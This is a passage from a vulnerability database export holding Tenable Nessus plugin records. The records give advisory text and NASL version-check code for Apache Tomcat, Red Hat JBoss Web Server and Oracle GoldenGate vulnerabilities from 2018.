Tomcat \n prior to version 9.0.10. Hostname validation was not enabled by \n default when using TLS with the WebSocket client (CVE-2018-8034).\n\n An information disclosure vulnerability exists in Apache Tomcat\n prior to version 9.0.10 due to a race condition. 
If an async\n request was completed by the application at the same time as the \n container triggered the async timeout, this could lead to a user\n being sent the response of another user (CVE-2018-8037).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://svn.apache.org/viewvc?view=rev&rev=1831726\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.9 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed: '9.0.9', min:'9.0.0', severity:SECURITY_HOLE, granularity_regex: \"^9(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:39:56", "description": "An update is now available for Red Hat JBoss Web Server 3.1 for RHEL 6 and Red Hat JBoss Web Server 3.1 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 4 serves as a replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable 'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat-native: Mishandled OCSP invalid response (CVE-2018-8019)\n\n* tomcat-native: Mishandled OCSP responses can allow clients to authenticate with revoked certificates (CVE-2018-8020)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nThe following packages have been upgraded to a newer upstream version :\n\n* OpenSSL 
(1.0.2n)\n\n* APR (1.6.3)\n\nCVE-2018-8019 and CVE-2018-8020 were discovered by Coty Sutherland (Red Hat).", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : Red Hat JBoss Web Server 3.1.0 Service Pack 4 (RHSA-2018:2469)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8019", "CVE-2018-8020"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:tomcat-native", "p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo", "p-cpe:/a:redhat:enterprise_linux:tomcat7", "p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc", "p-cpe:/a:redhat:enterprise_linux:tomcat7-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux", "p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api", "p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat8", "p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps", "p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp", "p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api", "p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc", "p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api", "p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc", "p-cpe:/a:redhat:enterprise_linux:tomcat8-lib", "p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j", "p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux", "p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api", "p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2018-2469.NASL", "href": "https://www.tenable.com/plugins/nessus/111804", "sourceData": "#\n# (C) Tenable Network 
Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:2469. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111804);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:45\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8019\", \"CVE-2018-8020\");\n script_xref(name:\"RHSA\", value:\"2018:2469\");\n\n script_name(english:\"RHEL 6 / 7 : Red Hat JBoss Web Server 3.1.0 Service Pack 4 (RHSA-2018:2469)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 3.1 for RHEL 6\nand Red Hat JBoss Web Server 3.1 for RHEL 7.\n\nRed Hat Product Security has rated this release as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. 
It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1 Service Pack 4 serves as\na replacement for Red Hat JBoss Web Server 3.1, and includes bug\nfixes, which are documented in the Release Notes document linked to in\nthe References.\n\nSecurity Fix(es) :\n\n* tomcat: Insecure defaults in CORS filter enable\n'supportsCredentials' for all origins (CVE-2018-8014)\n\n* tomcat-native: Mishandled OCSP invalid response (CVE-2018-8019)\n\n* tomcat-native: Mishandled OCSP responses can allow clients to\nauthenticate with revoked certificates (CVE-2018-8020)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nThe following packages have been upgraded to a newer upstream \nversion :\n\n* OpenSSL (1.0.2n)\n\n* APR (1.6.3)\n\nCVE-2018-8019 and CVE-2018-8020 were discovered by Coty Sutherland\n(Red Hat).\"\n );\n # https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/3.1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0349df1b\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:2469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8014\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-8020\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:2469\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"tomcat-native-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", 
reference:\"tomcat-native-debuginfo-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.17-17.redhat_17.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-admin-webapps-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-docs-webapp-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-el-2.2-api-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-javadoc-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsp-2.2-api-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-jsvc-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-lib-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-log4j-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-selinux-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-servlet-3.0-api-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat7-webapps-7.0.70-27.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-admin-webapps-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-docs-webapp-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-el-2.2-api-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-javadoc-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsp-2.3-api-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-jsvc-8.0.36-31.ep7.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"tomcat8-lib-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-log4j-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-selinux-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-servlet-3.1-api-8.0.36-31.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"tomcat8-webapps-8.0.36-31.ep7.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.17-17.redhat_17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.17-17.redhat_17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsvc-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-selinux-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.70-27.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"tomcat8-admin-webapps-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-docs-webapp-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-el-2.2-api-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-javadoc-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsp-2.3-api-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsvc-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-lib-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-log4j-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-selinux-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-servlet-3.1-api-8.0.36-31.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-webapps-8.0.36-31.ep7.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat-native / tomcat-native-debuginfo / tomcat7 / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:27", "description": "The version of Apache Tomcat installed on the remote host is 8.5.x prior to 8.5.32. 
It is, therefore, affected by multiple vulnerabilities.", "cvss3": {}, "published": "2018-07-13T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.5.0 < 8.5.32 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2018-8034", "CVE-2018-8037"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_32.NASL", "href": "https://www.tenable.com/plugins/nessus/111068", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111068);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-8014\", \"CVE-2018-8034\", \"CVE-2018-8037\");\n script_bugtraq_id(104203);\n\n script_name(english:\"Apache Tomcat 8.5.0 < 8.5.32 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.5.x\nprior to 8.5.32. 
It is, therefore, affected by multiple\nvulnerabilities.\");\n # http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.32\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5070a438\");\n # https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d5ab19d6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.32 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8014\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude(\"tomcat_version.inc\");\n\ntomcat_check_version(fixed:\"8.5.32\", min:\"8.5.0\", severity:SECURITY_HOLE, granularity_regex:\"^8(\\.5)?$\");\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-09T14:39:36", "description": "The version of Oracle GoldenGate for Big Data application located on the remote host is 12.2.0.1.x less than 12.2.0.1.10 or 12.3.1.1.x less than 12.3.1.1.6. It is, therefore, affected by multiple vulnerabilities : \n\n - An unspecified vulnerability exists in Oracle GoldenGate for Big Data. An authenticated, remote attacker can exploit this, via unknown vectors, to compromise confidentiality, integrity, and availability.\n (CVE-2016-0635)\n\n - An authorization bypass vulnerability exists in Spring Framework 5.0.5 when used in conjunction with Spring Security and using method security. An authenticated, remote attacker can exploit this to gain unauthorized access to methods that should be restricted. (CVE-2018-1258)\n\n - A remote code execution vulnerability exists in the Spring Framework. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands. 
(CVE-2018-1275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-03-05T00:00:00", "type": "nessus", "title": "Oracle GoldenGate for Big Data 12.2.0.1.x < 12.2.0.1.10 / 12.3.1.1.x < 12.3.1.1.6 Multiple Vulnerabilities (Oct 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0635", "CVE-2018-1258", "CVE-2018-1275"], "modified": "2022-05-18T00:00:00", "cpe": ["cpe:/a:oracle:goldengate_application_adapters"], "id": "ORACLE_GOLDENGATE_FOR_BIG_DATA_CPU_OCT_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/134225", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134225);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/18\");\n\n script_cve_id(\"CVE-2016-0635\", \"CVE-2018-1258\", \"CVE-2018-1275\");\n script_bugtraq_id(91869, 103771, 104222);\n\n script_name(english:\"Oracle GoldenGate for Big Data 12.2.0.1.x < 12.2.0.1.10 / 12.3.1.1.x < 12.3.1.1.6 Multiple Vulnerabilities (Oct 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Oracle GoldenGate for Big Data application on the remote host is affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle GoldenGate for Big Data application located on the remote host is 12.2.0.1.x less than\n12.2.0.1.10 or 12.3.1.1.x less than 12.3.1.1.6. It is, therefore, affected by multiple vulnerabilities : \n\n - An unspecified vulnerability exists in Oracle GoldenGate for Big Data. 
An authenticated, remote attacker\n can exploit this, via unknown vectors, to compromise confidentiality, integrity, and availability.\n (CVE-2016-0635)\n\n - An authorization bypass vulnerability exists in Spring Framework 5.0.5 when used in conjunction with\n Spring Security and using method security. An authenticated, remote attacker can exploit this to gain\n unauthorized access to methods that should be restricted. (CVE-2018-1258)\n\n - A remote code execution vulnerability exists in the Spring Framework. An unauthenticated, remote attacker\n can exploit this to bypass authentication and execute arbitrary commands. (CVE-2018-1275)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuoct2018.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patches according to the October 2018 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0635\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-1275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n 